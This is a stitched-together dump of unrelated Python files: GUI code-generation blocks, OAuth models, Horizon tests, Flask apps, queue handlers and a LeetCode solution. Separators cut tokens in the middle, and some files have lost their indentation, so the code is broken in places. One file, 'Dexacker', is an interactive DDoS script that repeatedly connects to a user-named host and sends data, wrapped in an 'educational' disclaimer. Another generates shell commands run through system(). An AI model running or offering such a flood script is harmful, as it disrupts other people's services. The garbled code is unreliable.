            'enIsntZero'
        ]

        handlers = [
            'on_cancel_clicked',
            'on_prop_confirm_clicked',
            'on_BackColorButton_clicked',
            'on_BorderColorButton_clicked'
        ]

        top_window = 'Properties'
        GladeWindow.__init__(self, filename, top_window, widget_list, handlers)

        # load properties values
        self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property")
        for Property in self.block_properties:
            if Property.name == "cmdString":
                self.widgets['cmdString'].set_text(Property.value)
            if Property.name == "enIsntZero":
                self.widgets['enIsntZero'].set_active(Property.value == "True")

        self.configure()

        # load help text
        # t_oS2iHelp = XMLParser(self.m_sDataDir + "help/runCmd" + _("_en.help"))
        # t_oTextBuffer = gtk.TextBuffer()
        # t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent())))
        # self.widgets['HelpView'].set_buffer(t_oTextBuffer)

    #----------------Help Text--------------------------------------
    def getHelp(self):  # help added
        # (Portuguese, translated): "Runs a system call depending on the
        # binary evaluation of pixel (0,0) of the input image."
        return "Executa uma chamada de sistema dependendo da avaliação binaria do pixel (0,0) da imagem de entrada."

    # ----------------------------------------------------------------------
    def __del__(self):
        pass

    # ----------------------------------------------------------------------
    def on_prop_confirm_clicked(self, *args):
        """Persist the edited properties back into the block's XML and close."""
        for Property in self.block_properties:
            if Property.name == "cmdString":
                Property.value = unicode(self.widgets['cmdString'].get_text())
            if Property.name == "enIsntZero":
                Property.value = unicode(self.widgets['enIsntZero'].get_active())

        self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML)
        self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor)
        self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor)

        self.widgets['Properties'].destroy()
# ----------------------------------------------------------------------
# propProperties = Properties()()
# propProperties.show( center=0 )
# ------------------------------------------------------------------------------
# Code generation
# ------------------------------------------------------------------------------
def generate(blockTemplate):
    """Emit the C code fragment for the 'Run Command' block.

    Reads the block's 'cmdString' and 'enIsntZero' properties and fills in
    blockTemplate.imagesIO / functionCall / dealloc with C source. The shell
    command is run via system() with HRP_DB exported as the block's input
    value; when 'enIsntZero' is set it only runs for inputs > 0.
    """
    cmdString = 'echo no properties'
    enIsntZero = False
    for propIter in blockTemplate.properties:
        if propIter[0] == 'cmdString':
            cmdString = propIter[1]
        if propIter[0] == 'enIsntZero':
            enIsntZero = (propIter[1] == "True")
    # escape quotes so the command can sit inside a C string literal
    cmdString = cmdString.replace(r"'", r"\'")
    cmdString = cmdString.replace(r'"', r'\"')
    blockTemplate.imagesIO = \
        'double block$$_double_i1;\n' + \
        'double block$$_double_o1;\n'
    blockTemplate.functionCall = '\nif('
    if enIsntZero:
        blockTemplate.functionCall += 'block$$_double_i1 > 0.0){\n'
    else:
        blockTemplate.functionCall += '1){\n'
    # +30 bytes of headroom for the "export HRP_DB=%f;" prefix
    blockTemplate.functionCall += 'char outPutStr[' + str(len(cmdString) + 30) + '];\n' + \
                                  'snprintf(outPutStr,' + str(len(
                                      cmdString) + 30) + ',"export HRP_DB=%f;' + cmdString + '",(float)block$$_double_i1);' + \
                                  'system(outPutStr);}\n' + \
                                  'block$$_double_o1 = block$$_double_i1;\n'
    blockTemplate.dealloc = '//nothing to deallocate\n'
# ------------------------------------------------------------------------------
# Block Setup
# ------------------------------------------------------------------------------
def getBlock():
    """Return the palette/metadata description of the "Run Command" block."""
    block = {
        # Human-visible strings go through gettext for translation.
        "Label": _("Run Command"),
        "Path": {"Python": "runCmd",
                 "Glade": "glade/runCmd.ui",
                 "Xml": "xml/runCmd.xml"},
        "Icon": "images/runCmd.png",
        "Color": "200:200:60:150",
        "InTypes": {0: "HRP_DOUBLE"},
        "OutTypes": {0: "HRP_DOUBLE"},
        "Description": _("Runs a shell command depending on the input value."),
        "TreeGroup": _("Experimental"),
    }
    return block
|
#coding=utf-8
#-*- encoding: utf-8 -*-
import tornado.ioloop
import tornado.iostream
import socket
import struct
import NotifyTCPServer
def readPacketHeader():
    # Ask the stream for one fixed-size header, then parse it.
    stream.read_bytes(NotifyTCPServer.PACKET_HEADER_LEN, parsePacketHeader)
def parsePacketHeader(data):
sign,cmd,bodySize = struct.unpack('>2sHH', data)
print "Sign: %s, Command: %s, Size: %s" % (sign,cmd,bodySize)
command=cmd
stream.read_bytes(bodySize, parsePacketBody)
def parsePacketBody(data):
    """Handle one packet body, then go back to waiting for a header."""
    print "Data: %s" % str(data)
    # Reply to pings by echoing the payload back to the server.
    if command == NotifyTCPServer.NOTIFY_COMMAND_PING:
        send_ping(data)
    readPacketHeader()
def | send_register(userKey):
send_packet(NotifyTCPServer.NOTIFY_COMMAND_REGISTER, userKey)
def send_ping(msg):
    # Echo a ping payload back to the server.
    send_packet(NotifyTCPServer.NOTIFY_COMMAND_PING, msg)
def send_packet(cmd, msg):
    """Frame and write one packet: 'NT' signature, command, length, body."""
    data = bytes(msg)
    stream.write(struct.pack(">2sHH", "NT", cmd, len(data)))
    stream.write(data)
def send_request():
    # Connection established: start the read loop, then register this client.
    readPacketHeader()
    send_register('591410cbf9614cbf9aaac4a871ddb466')
# Last command id parsed from an incoming header (0 = none seen yet).
command=0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
stream = tornado.iostream.IOStream(s)
# send_request fires once the connection is established.
stream.connect(("localhost", 9002), send_request)
#stream.connect(("221.180.20.232", 9002), send_request)
tornado.ioloop.IOLoop.instance().start()
#! /usr/bin/env python
import sys, os
sys.path.append('./include/python')
import proteomatic
import string
import re
class TransposeDna(proteomatic.ProteomaticScript):
    """Reverse-complements the DNA sequence given in the 'nucleotides' param."""
    def run(self):
        # convert all characters to upper case
        # Attention: parameters are Unicode because of the JSON parser
        # used behind the scenes, convert nucleotides to ASCII string
        dna = str(self.param['nucleotides']).upper()
        # remove invalid characters (anything that is not A, C, G or T)
        dna = re.sub('[^ACGT]', '', dna)
        # reverse sequence
        dna = dna[::-1]
        # replace nucleotides with their complements
        # NOTE(review): string.maketrans is Python 2 only; Python 3 would
        # need str.maketrans — confirm the target interpreter.
        dna = dna.translate(string.maketrans('ACGT', 'TGCA'))
        # output transposed DNA
        print(dna)
        if 'result' in self.output:
            with open(self.output['result'], 'w') as f:
                f.write(dna + "\n")
if __name__ == '__main__':
    # Instantiation presumably triggers the proteomatic run dispatch in
    # the base class constructor — confirm against the framework.
    script = TransposeDna()
|
#-*- coding: utf-8 -*-
"""OAuth 2.0 Django Models"""
import time
from hashlib import sha512
from uuid import uuid4
from django.db import models
from django.contrib.auth.models import User
from .consts import CLIENT_KEY_LENGTH, CLIENT_SECRET_LENGTH
from .consts import SCOPE_LENGTH
from .consts import ACCESS_TOKEN_LENGTH, REFRESH_TOKEN_LENGTH
from .consts import ACCESS_TOKEN_EXPIRATION, MAC_KEY_LENGTH, REFRESHABLE
from .consts import CODE_KEY_LENGTH, CODE_EXPIRATION
from djangotoolbox.fields import ListField
class TimestampGenerator(object):
    """Factory of UNIX timestamps offset into the future.

    Instances are callable; every call returns ``int(time.time())`` plus
    the ``seconds`` offset supplied at construction time (default 0).
    Used as a Django field default, so the value is computed per call.
    """
    def __init__(self, seconds=0):
        self.seconds = seconds

    def __call__(self):
        now = int(time.time())
        return now + self.seconds
class KeyGenerator(object):
    """Callable Key Generator that returns a random keystring.
    **Args:**
    * *length:* A integer indicating how long the key should be.
    *Returns str*
    """
    def __init__(self, length):
        self.length = length

    def __call__(self):
        # Bug fix: uuid4().hex is text and hashlib requires bytes on
        # Python 3; encoding explicitly works on both Python 2 and 3
        # (the hex digits are plain ASCII).
        return sha512(uuid4().hex.encode('ascii')).hexdigest()[0:self.length]
class Client(models.Model):
    """Stores client authentication data.
    **Args:**
    * *name:* A string representing the client name.
    * *user:* A django.contrib.auth.models.User object representing the client
    owner.
    **Kwargs:**
    * *description:* A string representing the client description.
    *Default None*
    * *key:* A string representing the client key. *Default 30 character
    random string*
    * *secret:* A string representing the client secret. *Default 30 character
    random string*
    * *redirect_uri:* A string representing the client redirect_uri.
    *Default None*
    """
    name = models.CharField(max_length=256)
    user = models.ForeignKey(User)
    description = models.TextField(null=True, blank=True)
    # KeyGenerator instances are callable, so Django evaluates a fresh
    # random key for every row rather than sharing one fixed default.
    key = models.CharField(
        unique=True,
        max_length=CLIENT_KEY_LENGTH,
        default=KeyGenerator(CLIENT_KEY_LENGTH),
        db_index=True)
    secret = models.CharField(
        unique=True,
        max_length=CLIENT_SECRET_LENGTH,
        default=KeyGenerator(CLIENT_SECRET_LENGTH))
    redirect_uri = models.URLField(null=True)
class AccessRange(models.Model):
    """Stores access range data, also known as scope.
    **Args:**
    * *key:* A string representing the access range scope. Used in access
    token requests.
    **Kwargs:**
    * *description:* A string representing the access range description.
    *Default None*
    """
    # Indexed and unique: scopes are looked up by key during token requests.
    key = models.CharField(unique=True, max_length=SCOPE_LENGTH, db_index=True)
    description = models.TextField(blank=True)
class AccessToken(models.Model):
    """Stores access token data.
    **Args:**
    * *client:* A oauth2app.models.Client object
    * *user:* A django.contrib.auth.models.User object
    **Kwargs:**
    * *token:* A string representing the access key token. *Default 10
    character random string*
    * *refresh_token:* A string representing the access key token. *Default 10
    character random string*
    * *mac_key:* A string representing the MAC key. *Default None*
    * *expire:* A positive integer timestamp representing the access token's
    expiration time.
    * *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
    * *refreshable:* A boolean that indicates whether this access token is
    refreshable. *Default False*
    """
    client = models.ForeignKey(Client)
    user = models.ForeignKey(User)
    # Callable defaults (KeyGenerator / TimestampGenerator instances) are
    # invoked by Django per row, so each token gets fresh values.
    token = models.CharField(
        unique=True,
        max_length=ACCESS_TOKEN_LENGTH,
        default=KeyGenerator(ACCESS_TOKEN_LENGTH),
        db_index=True)
    refresh_token = models.CharField(
        unique=True,
        blank=True,
        null=True,
        max_length=REFRESH_TOKEN_LENGTH,
        default=KeyGenerator(REFRESH_TOKEN_LENGTH),
        db_index=True)
    mac_key = models.CharField(
        blank=True,
        null=True,
        max_length=MAC_KEY_LENGTH,
        default=None)
    # Creation time as a UNIX timestamp; not editable after issue.
    issue = models.PositiveIntegerField(
        editable=False,
        default=TimestampGenerator())
    # Expiry defaults to "now + ACCESS_TOKEN_EXPIRATION" at row creation.
    expire = models.PositiveIntegerField(
        default=TimestampGenerator(ACCESS_TOKEN_EXPIRATION))
    scope = ListField()
    refreshable = models.BooleanField(default=REFRESHABLE)
class Code(models.Model):
    """Stores authorization code data.
    **Args:**
    * *client:* A oauth2app.models.Client object
    * *user:* A django.contrib.auth.models.User object
    **Kwargs:**
    * *key:* A string representing the authorization code. *Default 30
    character random string*
    * *expire:* A positive integer timestamp representing the access token's
    expiration time.
    * *redirect_uri:* A string representing the redirect_uri provided by the
    requesting client when the code was issued. *Default None*
    * *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
    """
    client = models.ForeignKey(Client)
    user = models.ForeignKey(User)
    # Callable default: a fresh random code per row.
    key = models.CharField(
        unique=True,
        max_length=CODE_KEY_LENGTH,
        default=KeyGenerator(CODE_KEY_LENGTH),
        db_index=True)
    issue = models.PositiveIntegerField(
        editable=False,
        default=TimestampGenerator())
    # Authorization codes are short-lived: "now + CODE_EXPIRATION".
    expire = models.PositiveIntegerField(
        default=TimestampGenerator(CODE_EXPIRATION))
    redirect_uri = models.URLField(null=True)
    scope = ListField()
class MACNonce(models.Model):
    """Stores Nonce strings for use with MAC Authentication.
    **Args:**
    * *access_token:* A oauth2app.models.AccessToken object
    * *nonce:* A unique nonce string.
    """
    access_token = models.ForeignKey(AccessToken)
    # Indexed for fast replay-detection lookups.
    nonce = models.CharField(max_length=30, db_index=True)
|
#!/usr/bin/env python
#______________________________________#
#Dexacker is an open source tool developed by Abdelmadjd Cherfaoui
#Dexacker is designed for educational purposes, to perform LEGAL DDoS testing; the developers are
# not responsible for ILLEGAL USES
#Contacting using:@Hexacker | fb.com/Hexacker
#http://www.hackercademy.com
#http://www.bringitsimple.com
#______________________________________#
#Importing Modules
import socket,os,sys,string
#Launching the tool
print "Lunching Dexacker..."
print "Remember that Dexacker is an Educational Tool\nand you are responsible for any ILLEGAL USES\nThe Developer is not responsible for your behaviors "
# Interactive configuration: target, port, payload and iteration count.
host = raw_input("Enter the website link you want to DDOS it: ")
port = int(raw_input("Enter the port you want to Attack: "))
message = raw_input("Write the message you want to send it: ")
connections = int(raw_input("How many beat you want to make: " ))
# Resolve the hostname once so every connection attempt reuses the IP.
IP = socket.gethostbyname(host)
#/
#The Attacking Function
def Attack():
attack = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
attack.connect((host,80))
attack.send(message)
attack.sendto(message, (IP,port))
attack.send(message);
excep | t socket.error,msg:
print "Connection Failed"
print "DDOS Attack Lunched"
attack.close()
for i in range(1,connections):
Attack()
print "______________________________________"
print "The Operation is finished"
#This is the restart function
def Restart():
    """Re-execute the current script in place, preserving argv."""
    program = sys.executable
    os.execl(program,program,* sys.argv)
CurDirectory = os.getcwd()
if __name__ == "__main__":
    request = raw_input("Do you start over? Y or N :")
    if request.strip() in "y Y yes Yes YES YEs yES".split():
        Restart()
    else:
        # Bug fix: the directory and the script name were concatenated
        # without a path separator (e.g. "/homeDexacker.py").
        os.system(os.path.join(CurDirectory, "Dexacker.py"))
|
"""Describe group states."""
from ho | meassistant.components.group import GroupIntegrationRegistry
from homeassistant.const import STATE_OK, STATE_PROBLEM
from homeassistant.core import HomeAssistant, callback
@callback
def async_describe_on_off_states(
    hass: HomeAssistant, registry: GroupIntegrationRegistry
) -> None:
    """Describe group on off states."""
    # STATE_PROBLEM counts as the "on" state for grouping purposes;
    # STATE_OK is the default "off" state.
    registry.on_off_states({STATE_PROBLEM}, STATE_OK)
|
AndReturn([self.servers.list(), False])
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest)).MultipleTimes().\
AndReturn(self.cinder_limits['absolute'])
self.mox.ReplayAll()
url = VOLUME_INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'Unable to delete volume "%s". '
u'One or more snapshots depend on it.' %
volume.name)
    @test.create_stubs({cinder: ('volume_get',), api.nova: ('server_list',)})
    def test_edit_attachments(self):
        """The attach form shows an editable device (mount point) field
        when can_set_mount_point is enabled."""
        # Save and restore the global setting so other tests are unaffected.
        PREV = settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point']
        settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point'] = True
        volume = self.cinder_volumes.first()
        servers = [s for s in self.servers.list()
                   if s.tenant_id == self.request.user.tenant_id]
        volume.attachments = [{'id': volume.id,
                               'volume_id': volume.id,
                               'volume_name': volume.name,
                               'instance': servers[0],
                               'device': '/dev/vdb',
                               'server_id': servers[0].id}]
        cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
        api.nova.server_list(IsA(http.HttpRequest)).AndReturn([servers, False])
        self.mox.ReplayAll()
        url = reverse('horizon:project:volumes:volumes:attach',
                      args=[volume.id])
        res = self.client.get(url)
        msg = 'Volume %s on instance %s' % (volume.name, servers[0].name)
        self.assertContains(res, msg)
        # NOTE(review): the assertion below expects a single entry in
        # _choices, but the original comment claimed two (the instance
        # plus a 'Choose Instance' placeholder) — confirm which is right.
        form = res.context['form']
        self.assertEqual(len(form.fields['instance']._choices),
                         1)
        self.assertEqual(res.status_code, 200)
        self.assertTrue(isinstance(form.fields['device'].widget,
                                   widgets.TextInput))
        settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point'] = PREV
    @test.create_stubs({cinder: ('volume_get',), api.nova: ('server_list',)})
    def test_edit_attachments_cannot_set_mount_point(self):
        """The device field is hidden when the hypervisor cannot set a
        mount point (setting defaults to disabled here)."""
        volume = self.cinder_volumes.first()
        servers = [s for s in self.servers.list()
                   if s.tenant_id == self.request.user.tenant_id]
        cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
        api.nova.server_list(IsA(http.HttpRequest)).AndReturn([servers, False])
        self.mox.ReplayAll()
        url = reverse('horizon:project:volumes:volumes:attach',
                      args=[volume.id])
        res = self.client.get(url)
        # Assert the device field is hidden.
        form = res.context['form']
        self.assertTrue(isinstance(form.fields['device'].widget,
                                   widgets.HiddenInput))
    @test.create_stubs({cinder: ('volume_get',),
                        api.nova: ('server_list',)})
    def test_edit_attachments_attached_volume(self):
        """The attach form of an already-attached volume still lists the
        owning instance as a selectable choice."""
        servers = [s for s in self.servers.list()
                   if s.tenant_id == self.request.user.tenant_id]
        server = servers[0]
        volume = self.cinder_volumes.list()[0]
        cinder.volume_get(IsA(http.HttpRequest), volume.id) \
            .AndReturn(volume)
        api.nova.server_list(IsA(http.HttpRequest)) \
            .AndReturn([servers, False])
        self.mox.ReplayAll()
        url = reverse('horizon:project:volumes:volumes:attach',
                      args=[volume.id])
        res = self.client.get(url)
        # First choice is the placeholder, second is the actual server.
        self.assertEqual(res.context['form'].fields['instance']._choices[0][1],
                         "Select an instance")
        self.assertEqual(len(res.context['form'].fields['instance'].choices),
                         2)
        self.assertEqual(res.context['form'].fields['instance']._choices[1][0],
                         server.id)
        self.assertEqual(res.status_code, 200)
    @test.create_stubs({cinder: ('tenant_absolute_limits',
                                 'volume_list',
                                 'volume_backup_supported',),
                        api.nova: ('server_list',)})
    def test_create_button_disabled_when_quota_exceeded(self):
        """The 'Create Volume' button is rendered disabled once the
        volume quota is fully used."""
        # Simulate a fully consumed quota.
        limits = self.cinder_limits['absolute']
        limits['totalVolumesUsed'] = limits['maxTotalVolumes']
        volumes = self.cinder_volumes.list()
        api.cinder.volume_backup_supported(IsA(http.HttpRequest)). \
            MultipleTimes().AndReturn(True)
        cinder.volume_list(IsA(http.HttpRequest), search_opts=None)\
            .AndReturn(volumes)
        api.nova.server_list(IsA(http.HttpRequest), search_opts=None)\
            .AndReturn([self.servers.list(), False])
        cinder.tenant_absolute_limits(IsA(http.HttpRequest))\
            .MultipleTimes().AndReturn(limits)
        self.mox.ReplayAll()
        res = self.client.get(VOLUME_INDEX_URL)
        self.assertTemplateUsed(res, 'project/volumes/index.html')
        volumes = res.context['volumes_table'].data
        self.assertItemsEqual(volumes, self.cinder_volumes.list())
        # Reconstruct the anchor markup the table is expected to render
        # for a disabled create action and compare as parsed HTML.
        create_link = tables.CreateVolume()
        url = create_link.get_link_url()
        classes = list(create_link.get_default_classes())\
            + list(create_link.classes)
        link_name = "%s (%s)" % (unicode(create_link.verbose_name),
                                 "Quota exceeded")
        expected_string = "<a href='%s' title='%s' class='%s disabled' "\
            "id='volumes__action_create' data-update-url=" \
            "'/project/volumes/?action=create&table=volumes'> "\
            "<span class='glyphicon glyphicon-plus'></span>%s</a>" \
            % (url, link_name, " ".join(classes), link_name)
        self.assertContains(res, expected_string, html=True,
                            msg_prefix="The create button is not disabled")
    @test.create_stubs({cinder: ('volume_get',),
                        api.nova: ('server_get',)})
    def test_detail_view(self):
        """The volume detail page shows name, id, status, size and a link
        to the attached instance."""
        volume = self.cinder_volumes.first()
        server = self.servers.first()
        volume.attachments = [{"server_id": server.id}]
        cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
        api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
        self.mox.ReplayAll()
        url = reverse('horizon:project:volumes:volumes:detail',
                      args=[volume.id])
        res = self.client.get(url)
        self.assertContains(res, "<h2>Volume Details: Volume name</h2>",
                            1, 200)
        self.assertContains(res, "<dd>Volume name</dd>", 1, 200)
        self.assertContains(res, "<dd>%s</dd>" % volume.id, 1, 200)
        self.assertContains(res, "<dd>Available</dd>", 1, 200)
        self.assertContains(res, "<dd>40 GB</dd>", 1, 200)
        self.assertContains(res,
                            ("<a href=\"/project/instances/1/\">%s</a>"
                             % server.name),
                            1,
                            200)
        self.assertNoMessages()
    @test.create_stubs({cinder: ('volume_get',)})
    def test_get_data(self):
        """AJAX row update succeeds for a volume whose API name is empty."""
        volume = self.cinder_volumes.get(name='v2_volume')
        # Blank the backing name to exercise the display-name fallback.
        volume._apiresource.name = ""
        cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
        self.mox.ReplayAll()
        url = VOLUME_INDEX_URL + \
            "?action=row_update&table=volumes&obj_id=" + volume.id
        res = self.client.get(url, {},
                              HTTP_X_REQUESTED_WITH='XMLHttpRequest')
        self.assertEqual(res.status_code, 200)
|
#!/usr | /bin/env python
# encoding: utf-8
"""
__init__.py
The MIT License (MIT)
Copyright (c) 2013 Matt Ryan
| Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import os
import stomp
import json
import afutils.file_pattern as pattern
from aflib3 import AFLibraryEntry
class AFMQ:
    '''Represents a basic connection to an ActiveMQ
    service for AudioFile.
    '''
    def __init__(self, queue_name):
        # Connect immediately and subscribe with automatic acknowledgement.
        self.queue_name = queue_name
        self.queue_handle = stomp.Connection()
        self.queue_handle.start()
        self.queue_handle.connect()
        self.queue_handle.subscribe(destination=queue_name, ack='auto')
    def __del__(self):
        # NOTE(review): relying on __del__ for disconnect is fragile; it
        # may never run on abrupt interpreter exit.
        self.queue_handle.disconnect()
    def put(self, msg):
        # Publish one message to this queue.
        self.queue_handle.send(msg, destination=self.queue_name)
class BasicHandler:
    '''Represents an ActiveMQ handler that consumes information
    from the queue.
    '''
    def __init__(self, aflib, queue_name):
        # Registers itself as the stomp listener, so the on_error and
        # on_message callbacks below receive this queue's traffic.
        self.aflib = aflib
        self.queue_name = queue_name
        self.queue_handle = stomp.Connection()
        self.queue_handle.set_listener(queue_name, self)
        self.queue_handle.start()
        self.queue_handle.connect()
        self.queue_handle.subscribe(destination=queue_name, ack='auto')
    def __del__(self):
        # NOTE(review): cleanup in __del__ is not guaranteed to run.
        self.queue_handle.stop()
    def on_error(self, headers, message):
        print '%s: Received an error: "%s"' % (self.__class__, message)
    def on_message(self, headers, message):
        # Subclasses override/extend this to act on the payload.
        print '%s: Received message: "%s"' % (self.__class__, message)
class AddFileHandler(BasicHandler):
    '''Adds files to the AudioFile library as the files
    are posted into a queue.
    '''
    def __init__(self, aflib):
        BasicHandler.__init__(self, aflib, '/audiofile/library_additions')
    def on_message(self, headers, message):
        BasicHandler.on_message(self, headers, message)
        # Message body is a JSON array; args[0] and args[1] are forwarded
        # to add_mp3 — exact meaning is defined by the aflib API.
        args = json.loads(message)
        self.aflib.add_mp3(args[0], args[1])
class RenameFileHandler(BasicHandler):
    '''Renames files from the old path to the new specified
    path as the information is put into a queue.
    '''
    def __init__(self, aflib):
        BasicHandler.__init__(self, aflib, '/audiofile/file_renames')
    def on_message(self, headers, message):
        BasicHandler.on_message(self, headers, message)
        # Message body is a JSON array: [song_dict, filename_pattern].
        args = json.loads(message)
        song = AFLibraryEntry()
        song.apply_dict(args[0])
        newpath = pattern.get_new_path(song, args[1])
        print 'Renaming "%s" as "%s"...' % (song.path, newpath)
        os.rename(song.path, newpath)
if __name__ == '__main__':
    # Module is import-only; no standalone behavior.
    pass
|
import logging
from django.core.management.base import BaseCommand
| from citation.ping_urls import verify_url_status
logger = logging.getLogger(__ | name__)
class Command(BaseCommand):
    help = '''Method that check if the code archived urls are active and working or not '''
    def handle(self, *args, **options):
        """Entry point for the management command."""
        # The actual URL health check lives in citation.ping_urls.
        verify_url_status()
        logger.debug("Validation completed")
|
from flask import Blueprint, flash, redirect, render_template, request, url_for
from sqlalchemy.orm.exc import NoResultFound
from ..sqltypes import HashableLocale as Locale
from ..work import Trope, Work
from .db import session
adv_search_bp = Blueprint('adv_searc | h', __name__)
@adv_search_bp.route('/', methods=['POST'])
def result():
    """Run an advanced work search by media type and required tropes.

    Expects three parallel form lists (about[]/category[]/detail[]); each
    triple either restricts the media type (about == 'info', category ==
    'media') or requires a trope (about == 'trope', detail == trope id).
    Invalid input flashes a message and redirects to the index page.
    """
    about = request.form.getlist('about[]', None)
    category = request.form.getlist('category[]', None)
    detail = request.form.getlist('detail[]', None)
    error_redirect = redirect(url_for('index'))
    if about is None or category is None or detail is None:
        flash('Invalid arguments.', 'danger')
        return error_redirect
    if type(about) != list or type(category) != list or type(detail) != list:
        flash('Invalid arguments..', 'danger')
        return error_redirect
    if len(about) != len(category) or len(about) != len(detail):
        flash('Invalid arguments...', 'danger')
        return error_redirect
    query = zip(about, category, detail)
    media_list = []
    trope_filter = None
    for about, category, detail in query:
        if about == 'info':
            if category == 'media':
                media_list.append(detail)
        elif about == 'trope':
            # Bug fix: Query.get() returns None for a missing primary key
            # and never raises NoResultFound, so the previous try/except
            # was dead code and a missing trope crashed on trope.id below.
            trope = session.query(Trope).get(detail)
            if trope is None:
                return error_redirect
            if trope_filter is None:
                trope_filter = Work.tropes.any(Trope.id == trope.id)
            else:
                trope_filter = trope_filter & \
                    Work.tropes.any(Trope.id == trope.id)
    if not media_list and trope_filter is None:
        flash('Invalid arguments....', 'danger')
        return error_redirect
    result = session.query(
        Work,
        Work.canonical_name(Locale.parse('en_US')).label('canonical_name')
    )
    if media_list:
        result = result.filter(Work.media_type.in_(media_list))
    if trope_filter is not None:
        result = result.filter(trope_filter)
    return render_template('adv_search/result.html', result=result)
|
#!/usr/bin/env python
from flask import (Flask, request, render_template)
from flask.ext import restful
from flask.ext.restful import reqparse
import pickle
# Pickle file that persists the light state across restarts.
SETTINGS_P = 'settings.p'
app = Flask(__name__)
api = restful.Api(app)
def get_settings():
    """Load persisted settings from disk, falling back to the default
    state when the settings file is missing or unreadable."""
    settings = {'state':'off'}
    try:
        # Fix: use a context manager so the file handle is always closed
        # (the previous pickle.load(open(...)) leaked the handle).
        with open(SETTINGS_P, 'rb') as fp:
            settings = pickle.load(fp)
    except IOError:
        pass
    return settings
def set_state(state):
    """Persist the given light state ('on'/'off') to the settings file."""
    settings = get_settings()
    settings['state'] = state
    # Fix: use a context manager so the file is flushed and closed
    # deterministically (previously the handle from open() was leaked).
    with open(SETTINGS_P, 'wb') as fp:
        pickle.dump(settings, fp)
# Restful Resource for setting the light state
@api.resource('/api/state')
class SetState(restful.Resource):
    def get(self):
        """Return — and optionally change — the light state.

        NOTE(review): a GET with a 'value' query argument mutates state;
        REST convention would use PUT/POST — confirm before relying on it.
        """
        settings = get_settings()
        parser = reqparse.RequestParser()
        parser.add_argument('value', type=str, location='args',
                            choices=['on','off'])
        args = parser.parse_args()
        value = args['value']
        if value:
            set_state(value)
            # Re-read so the response reflects the state just written.
            settings = get_settings()
            print "Setting state to {}".format(value)
        return {'state':settings['state']}
# View to present a form to change the light state
@app.route('/', methods=['GET','POST'])
def index():
    """Render the control form; persist a new state on POST."""
    if request.method == 'POST':
        set_state(request.form['state'])
    settings = get_settings()
    state = settings['state']
    return render_template('index.html', state=state)
if __name__ == '__main__':
    # NOTE(review): debug=True combined with 0.0.0.0 exposes the Werkzeug
    # debugger to the whole network — disable outside development.
    app.run(host='0.0.0.0', debug=True)
|
__source__ = 'https://leetcode.com/problems/nested-list-weight-sum/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/nested-list-weight-sum.py
# Time: O(n)
# Space: O(h)
#
# Description: Leetcode # 339. Nested List Weight Sum
#
# Given a nested list of integers, return the sum of all integers in the list weighted by their depth.
#
# Each element is either an integer, or a list -- whose elements m | ay also be integers or other lists.
#
# Example 1:
# Given the list [[1 | ,1],2,[1,1]], return 10. (four 1's at depth 2, one 2 at depth 1)
#
# Example 2:
# Given the list [1,[4,[6]]], return 27. (one 1 at depth 1, one 4 at depth 2, and one 6 at depth 3; 1 + 4*2 + 6*3 = 27)
#
# Companies
# LinkedIn
# Related Topics
# Depth-first Search
# Similar Questions
# Nested List Weight Sum II Array Nesting
#
# """
# This is the interface that allows for creating nested lists.
# You should not implement it, or speculate about its implementation
# """
import unittest
# 20ms 100%
class NestedInteger(object):
    # Interface stub only: real implementations are supplied by the judge;
    # the method bodies are intentionally just their docstrings.
    def isInteger(self):
        """
        @return True if this NestedInteger holds a single integer, rather than a nested list.
        :rtype bool
        """
    def getInteger(self):
        """
        @return the single integer that this NestedInteger holds, if it holds a single integer
        Return None if this NestedInteger holds a nested list
        :rtype int
        """
    def getList(self):
        """
        @return the nested list that this NestedInteger holds, if it holds a nested list
        Return None if this NestedInteger holds a single integer
        :rtype List[NestedInteger]
        """
class Solution(object):
    def depthSum(self, nestedList):
        """
        :type nestedList: List[NestedInteger]
        :rtype: int

        Iterative level-order traversal: integers found at depth d
        contribute value * d to the total.
        """
        total = 0
        level = list(nestedList)
        depth = 1
        while level:
            next_level = []
            for item in level:
                if item.isInteger():
                    total += item.getInteger() * depth
                else:
                    next_level.extend(item.getList())
            level = next_level
            depth += 1
        return total
class TestMethods(unittest.TestCase):
